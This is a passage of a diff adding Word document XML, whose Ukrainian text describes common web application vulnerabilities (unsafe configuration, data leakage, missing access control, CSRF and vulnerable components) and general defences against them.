+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>5. Небезпечна конфігурація</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Небезпечна конфігурація може бути присутн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">я </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>у всіх компонентах Web-додатки, включаючи платформу (операційну систему), Web-сервер, бази даних або інфраструктуру. Поширеними помилками є запущені без необхідності служби, облікові записи адміністратора з параметрами за замовчуванням, доступне для онлайн-перегляду вміст файлів і директорій. Однак улюбленою темою хакерів є небезпечна обробка повідомлень про помилки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>6. Витік вразливих даних</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>таких</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Якщо захист привілейованих функцій полягає лише в тому, що вони просто заховані в коді програми, то зловмисник, скомпрометував</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>8. Підробка міжсайтових запитів (CSRF)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Підробка міжсайтових запитів (cross-site request forgery, CSRF) заснована на тому, що аутентиф</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ікованого користувача Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обманним</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> шляхом змушують запустити шкідливий сценарій, який виконує дії від імені законного користувача. Наприклад, на комп'ютері користувача може таємно виконуватися CSRF-сценарій, що відправляє Web-додатком запит на зміну пароля, а після успішної авторизації користувача Web-додаток виконує цей запит.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>використання випадкових імен п</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>олів в різних формах Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, що робить неможливим створення зловмисником працюючого сценарію.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">9. Використання </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>компонентів з відомими уразливостями</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Будь-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>який сторонній компонент Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - будь то двійковий або вихідний код, комерційн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
